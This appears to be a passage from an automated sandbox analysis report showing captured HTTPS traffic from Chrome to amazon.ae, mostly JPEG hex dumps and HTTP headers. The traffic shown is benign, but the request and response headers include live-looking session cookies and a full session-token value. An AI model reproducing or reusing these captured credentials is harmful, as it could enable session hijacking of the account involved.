                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 09 ad 82 0a 3a 56 e3 1e ad 4d 1b 1d 8f ca da 1a 7e d5 c6 bc ef 92 5e 8e 23 87 0c 43 70 c4 70 c6 8f 00 15 85 04 ee 92 36 02 5e ed b8 1b 8f 53 86 93 8c 9c 77 65 00 b8 6e 2d 0e 05 c0 64 b7 3c f1 e3 84 dc 43 73 bc 14 88 87 a8 11 de 82 21 c8 23 bd 48 8e e0 50 32 a0 01 52 22 14 08 82 82 20 a9 11 25 40 86 54 88 65 40 65 01 01 04 10 04 8f 69 e4 e2 3e 08 26 7c ce 91 9b 26 0d 95 9f 93 20 0e 1f 6e 54 8b 05 db 40 68 0b c6 f3 74 d3 76 fa 97 48 31 24 9d 83 18 f3 e7 b9 81 a7 3e 69 b9 bb 0a bc 7a 31 70 72 e4 0f 65 6e a9 b6 48 46 03 e9 2a 1d 81 fa b2 6f 69 4d d3 33 2d 85 a5 f4 e5 b3 4c e9 da 0d 3f 6a 12 7e 0f b7 46 63 a7 32 bb 7c 84 17 17 12 e7 79 92 a1 10 ba a0 65 04 b9 52 19 50 20 a4 47 28 19 40 e6 82 20 28 11 41 04 0c a9 00 a0 4c 82 28 2d 57 cb 64 15 d4 53 52 4f 1b 65
                                                                                                                                                                                                                                                                Data Ascii: :VM~^#Cpp6^Swen-d<Cs!#HP2R" %@Te@ei>&|& nT@htvH1$>iz1prenHF*oiM3-L?j~Fc2|yeRP G(@ (AL(-WdSROe
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 17 9d 31 a7 27 bd 56 ec 19 65 2c 58 35 13 78 0e e6 b7 f3 8a b1 a7 c1 39 27 d1 53 57 aa 8c 35 df f3 4f 46 d9 a2 a2 a5 a2 a6 65 35 2c 62 28 63 18 6b 47 de 7c 49 5d ba 52 2b 1b 43 cc e4 c9 6b ce f6 ea f7 59 30 10 10 10 10 10 10 49 2c 51 cb 1b a2 95 a1 f1 bc 16 bd 8e 19 04 1e e2 0a 4c 44 f2 94 c4 cc 4e f0 d5 da c7 4a 3a d1 3f ac d2 82 eb 7c a7 0d ef 31 b8 fd 13 e5 e0 7f fb 3c 6d 56 9b 82 77 8e eb d1
                                                                                                                                                                                                                                                                Data Ascii: 1'Ve,X5x9'SW5OFe5,b(ckG|I]R+CkY0I,QLDNJ:?|1<mVw
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: ff 00 48 62 2b b4 f9 aa b2 d7 72 7d be 77 4a d6 ef 0e 69 69 61 38 1e 20 ad 1a 8c 11 92 36 75 3b 27 b5 2d a3 c9 37 88 e2 de 36 d9 2d c6 e5 3d 7c ad 92 60 d1 b4 61 a1 a3 1c 94 e1 c1 5c 71 b4 30 ed 2e d3 c9 ac bc 5a f1 11 b7 4d 94 ab 73 9c 20 20 20 20 20 20 cc f8 61 af e5 d2 57 af c7 ee 7d a2 b3 0c ad 88 73 2d c7 bb 2b 47 8b 73 cf c4 7c 97 1b b6 bb 2e 35 78 f9 7f 99 5e 9f db ea b5 a4 d4 fb bb 73 ee cb a7 29 2a e9 ab 29 a2 aa a5 95 b3 53 cc d0 f8 a5 61 cb 5c d7 0c 82 08 5f 33 c9 8e d4 b4 d6 d1 b4 c3 d0 44 c4 c6 f0 f6 58 24 40 40 40 40 41 6a d4 da 96 d7 a7 2d 13 5c ee 52 6c 86 31 86 30 7b f2 3c fb b1 b0 77 b8 ff 00 f5 e8 ad 68 f4 79 35 19 22 94 8e 73 fb 7a cb 5e 5c b1 4a ef 2e 55 d5 5a 96 e1 a9 2f 75 17 6a e3 89 26 38 8e 20 72 d8 e3 6f b9 1b 7c 80 fa cf 35 f5
                                                                                                                                                                                                                                                                Data Ascii: Hb+r}wJiia8 6u;'-76-=|`a\q0.ZMs aW}s-+Gs|.5x^s)*)Sa\_3DX$@@@@Aj-\Rl10{<why5"sz^\J.UZ/uj&8 ro|5


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                59192.168.2.449901151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC681OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3600
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: fb4e6c4f-b370-40c2-b652-e30090d66620
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 26 Aug 2043 16:31:15 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1469122
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000039-IAD, cache-nyc-kteb1890032-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 a8 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 05 06 07 08 02 03 04 01 09 10 00 02 01 03 01 04 05 06 0a 08 05 05 00 00 00 00 01 02 03 00 04 11 05 06 12 13 21 07 31 41 61 71 22 32 51 81 93 d2 14 42 54 72 91 92 a1 b1 b2 c1 17 34
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1Aaq"2QBTr4
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: d0 90 a9 8c ee 03 18 3d d8 25 97 78 81 e4 e3 ce 3c aa 27 6e 90 74 35 81 b7 62 b8 33 03 c9 43 26 3d 63 b2 91 bf 53 59 49 9d 7a 04 e2 da e4 29 8b 6a dd 15 9b 48 c1 51 4b 13 d8 aa 58 9f 50 e7 5d 3b 35 b4 ba 26 a1 6d 76 f7 72 05 90 07 e1 aa cb ba f9 51 d7 b9 8e ae c2 49 a5 e4 db eb 7d 9f bb 4b 06 79 2c dc f0 fc 8e 53 47 28 71 9d f5 97 ec 03 0b 51 95 fb e9 15 96 5b 4f 40 f3 9b c2 16 ba 30 8c 26 ab 21 1f 25 9b f1 25 4e d5 0c 6c 26 d8 0d a0 d7 a7 85 e2 40 f0 59 4c 4d d2 06 02 e4 17 44 05 09 03 28 bd 5f 39 6a 67 ac 15 a6 e5 51 c9 a3 d4 b7 b7 54 a9 28 27 90 aa 81 d2 55 ff 00 07 68 75 44 e0 86 c4 89 e5 99 30 39 a2 f6 04 cf 2f 9d 56 fe aa cf 48 77 76 91 ea da a0 22 3e 37 17 9b 3a 92 79 aa ee ff 00 0d 57 1a bb 8f 38 cf 91 74 a9 ef 2c 67 fa 90 fd ed 8b 5f 11 bd 26 07
                                                                                                                                                                                                                                                                Data Ascii: =%x<'nt5b3C&=cSYIz)jHQKXP];5&mvrQI}Ky,SG(qQ[O@0&!%%Nl&@YLMD(_9jgQT('UhuD09/VHwv">7:yW8t,g_&
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC844INData Raw: 9a 95 1c d9 17 96 4d 4b f5 0a f4 7b 2a c9 ae dd 60 8f d4 e5 fc 69 53 55 56 ed 61 45 f6 74 d6 11 ba 85 dd 4a f4 d5 4a ad 39 74 e4 15 55 f6 df 53 b7 b2 d7 35 41 2d d2 c1 23 4e 38 68 d3 2a 71 08 55 3e 5f 6c 63 b1 4b 72 35 6a 29 32 e7 41 d3 6e 9d a5 9e c6 de 57 6e b7 78 11 dd bc 49 19 35 55 4a 3d a4 52 ce 3c cd 54 ab 2a 72 6d ac f9 15 14 5e 5a ce f2 c4 67 8d e5 47 50 dc 4e 1b 28 df f4 39 ce 47 a1 ba ab 11 1d b9 91 d3 7e 05 55 ce 58 4c 88 32 7a 87 92 c7 04 78 10 6a db 1d 98 d2 3f 76 da ff 00 2d 1f f6 a3 fe d8 d2 3f 76 da ff 00 2d 1f bb 55 c6 da b4 3c 15 1a 25 39 da d4 cf 69 49 3f fb f8 ff 00 65 37 6b 3b 29 5b 7a 3b b5 4e 7c c3 cc 88 e3 97 5e eb 10 71 db 9c f9 5c 80 ae 79 ec 1f 0a 16 f6 2c b9 f3 1e 54 53 dd d4 fc cb 75 e0 75 55 d1 7d 95 d2 47 5e 9d 6b fc bc 7e
                                                                                                                                                                                                                                                                Data Ascii: MK{*`iSUVaEtJJ9tUS5A-#N8h*qU>_lcKr5j)2AnWnxI5UJ=R<T*rm^ZgGPN(9G~UXL2zxj?v-?v-U<%9iI?e7k;)[z;N|^q\y,TSuuU}G^k~


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                60192.168.2.449904151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC688OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2879
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 0ac3d599-0c37-4636-8ec0-59ff5f62cf6a
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sat, 29 Aug 2043 04:30:39 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                Age: 3372239
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000141-IAD, cache-ewr18141-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 86 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 08 05 07 01 03 04 02 09 10 00 02 01 03 03 02 04 03 06 07 00 03 00 00 00 00 01 02 03 00 04 11 05 12 21 06 31 13 22 41 51 07 14 71 32 33 42 61 62 91 08 15 23 52 81 a2 b1 53 83 a1
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQq23Bab#RS
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: be 8a d3 d1 4b ad c6 a3 aa 20 f1 de 32 b2 9b 0b 46 ee 80 e5 73 34 8b f8 37 27 d5 70 99 d5 f7 bd 43 75 70 5e 59 66 69 d8 42 15 5a 56 2c c8 07 91 30 dd fc 80 92 2b 23 a7 f5 a6 9b 6b 04 50 36 8f 14 8d 1c 44 34 84 a1 67 6f 59 0e 63 66 2c 4f b9 61 55 5a 26 7e a3 f8 c6 6a 5d 4b 0d cc f1 58 e9 99 8b 4d 59 14 c7 01 8c 44 c5 e4 45 8a 47 93 cf 33 31 27 b7 9d 80 f4 0b 52 8e 88 b6 59 ee 67 81 d7 2e 96 97 8d 13 7a c7 24 0b e2 03 f4 65 ca 32 9c 87 53 83 e9 51 f3 d5 76 77 e7 c0 87 44 b3 84 cd 27 96 55 32 99 93 73 e4 60 ef 11 e4 76 e1 02 fb 0a 9e 74 2d a1 3a a5 e4 df 86 0d 3f 54 90 fd 3c 2f 0b fe b5 5a 15 43 2d 2f af 8f 87 23 96 28 ea 0f 94 c7 0f 7e 46 1b c2 94 8f a6 da e5 e6 d5 c8 89 84 af 89 77 14 21 a2 19 d8 ed 13 7b 15 f3 29 1c 85 ce 33 d8 8a cd d9 d9 bc d6 16 71 86
                                                                                                                                                                                                                                                                Data Ascii: K 2Fs47'pCup^YfiBZV,0+#kP6D4goYcf,OaUZ&~j]KXMYDEG31'RYg.z$e2SQvwD'U2s`vt-:?T</ZC-/#(~Fw!{)3q
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC123INData Raw: ea 2d 58 bc 75 b2 6b 79 a4 f6 aa a7 e8 96 5a 97 53 38 87 4c b7 96 24 27 12 5f 4f 09 8a 18 07 a9 55 6c 19 5c 7a 20 e3 3c b1 ab 2d a1 68 76 ba 0d 9c 16 16 6a 44 51 03 cb 1d ce ec c7 73 bb b7 ab 3b 72 4d 65 c9 27 bd 7c d5 69 86 b4 8d 55 6b e7 b6 49 dd 8a 52 95 75 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 0a 52 94 1f ff d9
                                                                                                                                                                                                                                                                Data Ascii: -XukyZS8L$'_OUl\z <-hvjDQs;rMe'|iUkIRuRRRRRRRRRRR


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                61192.168.2.449906151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC685OUTGET /images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Cameras_1x._SY116_CB659040198_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2459
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 4434e34c-e8af-4bd0-99b2-479ec323eef3
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Sat, 27 Feb 2021 16:26:20 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sat, 19 Sep 2043 15:26:23 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 3377438
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100125-IAD, cache-ewr18163-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 8e 03 01 22 00 02 11 01 03 11 01 ff c4 00 8d 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 06 04 05 07 08 09 03 01 02 10 00 01 03 02 03 03 06 0b 06 05 05 01 00 00 00 00 01 00 02 03 04 11 05 12 21 06 13 31 22 32 41 51 91 b1 07 17 33 42 55 61 71 72 73 93 a1 08 34 52 62 81
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"2AQ3BUaqrs4Rb
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1081INData Raw: ac 4e 2a 04 87 94 07 e9 c9 3f dc 2f 49 e6 99 e6 37 ef 1c 4c 62 cd 24 ea dd 4b ad d6 35 24 aa b7 53 c5 3b 33 c5 7c a4 db 5e 20 aa 5a 56 19 1d bb e9 bd bf c7 61 ef 5b b1 71 63 9b 5d 1d cd 81 24 07 7e 57 9e 6b 87 a9 dc 0a 90 d1 6d 2d 55 25 2b e9 f2 b0 e8 e0 e0 e6 df 52 32 df 88 d4 0e 0a 3d 41 43 26 67 dd 87 77 28 7b 73 5b 4c c0 66 03 da 15 df 13 a6 2d a7 a6 aa b7 96 63 49 f6 f0 3f 50 a8 b2 e1 7c aa da 7b f4 ca de f5 d4 ea 56 06 43 03 5a 00 02 36 58 0d 00 d0 2e 58 e1 1f 7d a6 f8 ac ef 5d 50 83 c9 45 f0 d9 ff 00 c8 41 e8 88 88 08 88 83 54 be d0 fa 62 b8 47 f2 d2 f7 b5 60 56 b1 8e 27 30 59 eb ed 0f a6 2d 83 ff 00 2d 2f 7b 56 bb 4d 21 6b 8a a1 8c e4 7f 2d ad 0d bd b4 1a a8 8c 1f 78 8f de 0a fb 57 21 73 55 86 1f 2e df 7c 28 32 ee 03 56 05 0e 2b 4b e7 4d 0c a1 be
                                                                                                                                                                                                                                                                Data Ascii: N*?/I7Lb$K5$S;3|^ ZVa[qc]$~Wkm-U%+R2=AC&gw({s[Lf-cI?P|{VCZ6X.X}]PEATbG`V'0Y--/{VM!k-xW!sU.|(2V+KM


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                62192.168.2.44990318.239.36.214437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1200OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.amazon.ae
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=adb:adblk_no&t:1723469005585; ubid-acbae=261-1616972-1526733
                                                                                                                                                                                                                                                                2024-08-12 13:23:29 UTC1533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:29 GMT
                                                                                                                                                                                                                                                                Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                x-amz-rid: FM6WTY8CBHD58PDDSC05
                                                                                                                                                                                                                                                                set-cookie: session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; Domain=.amazon.ae; Expires=Tue, 12-Aug-2025 13:23:29 GMT; Path=/; Secure
                                                                                                                                                                                                                                                                Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                Accept-CH-Lifetime: 86400
                                                                                                                                                                                                                                                                content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                                                                                X-XSS-Protection: 1;
                                                                                                                                                                                                                                                                Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                Via: 1.1 f6b9514ab9239076a9af0bb69d273eb8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P2
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: fVRPt7yPzEX65BbNTpBZKJEhkjNd_D1ukAxy2J8SKY4lVqcDl_ZP8Q==
